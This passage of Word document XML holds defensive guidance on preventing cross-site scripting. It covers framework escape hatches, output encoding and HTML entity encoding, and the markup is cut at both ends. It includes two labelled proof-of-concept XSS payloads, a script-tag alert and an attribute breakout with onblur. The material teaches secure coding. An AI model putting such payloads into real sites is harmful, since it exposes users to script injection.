          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Fewer XSS bugs appear in applications built with modern web frameworks. These frameworks steer developers towards good security practices and help mitigate XSS by using templating, auto-escaping, and more. That said, developers need to be aware of problems that can occur when using frameworks insecurely such as:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="120"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>escape hatches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> that frameworks use to directly manipulate the DOM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="120"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">React’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>dangerouslySetInnerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> without sanitising the HTML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="120"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">React cannot handle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>javascript:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>data:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> URLs without specialized validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="120"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Angular’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>bypassSecurityTrustAs*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> functions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="120"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Template injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="120"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Out of date framework plugins or components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>and more</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Understand how your framework prevents XSS and where it has gaps. There will be times where you need to do something outside the protection provided by your framework. This is where Output Encoding and HTML Sanitization are critical. OWASP are producing framework specific cheatsheets for React, Vue, and Angular.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="336" w:after="220" w:before="550"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="34"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>XSS Defense Philosophy</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="28" w:name="_Toc28dao5fbx884"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>For XSS attacks to be successful, an attacker needs to insert and execute malicious content in a webpage. Each variable in a web application needs to be protected. Ensuring that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>all variables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> go through validation and are then escaped or sanitized is known as perfect injection resistance. Any variable that does not go through this process is a potential weakness. Frameworks make it easy to ensure variables are correctly validated and escaped or sanitised.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>However, frameworks aren't perfect and security gaps still exist in popular frameworks like React and Angular. Output Encoding and HTML Sanitization help address those gaps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="336" w:after="220" w:before="550"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="34"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Output Encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="29" w:name="_Toci75nfh061bmx"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Output Encoding is recommended when you need to safely display data exactly as a user typed it in. Variables should not be interpreted as code instead of text. This section covers each form of output encoding, where to use it, and where to avoid using dynamic variables entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Start with using your framework’s default output encoding protection when you wish to display data as the user typed it in. Automatic encoding and escaping functions are built into most frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>If you’re not using a framework or need to cover gaps in the framework then you should use an output encoding library. Each variable used in the user interface should be passed through an output encoding function. A list of output encoding libraries is included in the appendix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>There are many different output encoding methods because browsers parse HTML, JS, URLs, and CSS differently. Using the wrong encoding method may introduce weaknesses or harm the functionality of your application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="360" w:after="220" w:before="440"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Output Encoding for “HTML Contexts”</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="30" w:name="_Tocfjd3kq9i56df"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">“HTML Context” refers to inserting a variable between two basic HTML tags like a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;div&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;b&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>. For example..</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;div&gt; $varUnsafe &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker could modify data that is rendered as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>$varUnsafe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>. This could lead to an attack being added to a webpage.. for example.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;div&gt; &lt;script&gt;alert`1`&lt;/script&gt; &lt;/div&gt; // Example Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>In order to add a variable to a HTML context safely, use HTML entity encoding for that variable as you add it to a web template.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Here are some examples of encoded values for specific characters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">If you're using JavaScript for writing to HTML, look at the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>.textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> attribute as it is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Safe Sink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> and will automatically HTML Entity Encode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&amp;    &amp;amp;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;    &amp;lt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&gt;    &amp;gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>"    &amp;quot;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>'    &amp;#x27;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="360" w:after="220" w:before="440"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Output Encoding for “HTML Attribute Contexts”</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="31" w:name="_Tocyiui67vnt36r"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>“HTML Attribute Contexts” refer to placing a variable in an HTML attribute value. You may want to do this to change a hyperlink, hide an element, add alt-text for an image, or change inline CSS styles. You should apply HTML attribute encoding to variables being placed in most HTML attributes. A list of safe HTML attributes is provided in the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Safe Sinks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> section.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;div attr="$varUnsafe"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>&lt;div attr=”*x” onblur=”alert(1)*”&gt; // Example Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s critical to use quotation marks like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> to surround your variables. Quoting makes it difficult to change the context a variable operates in, which helps prevent XSS. Quoting also significantly reduces the characterset that you need to encode, making your application more reliable and the encoding easier to implement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">If you're using JavaScript for writing to a HTML Attribute, look at the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>.setAttribute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>[attribute]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
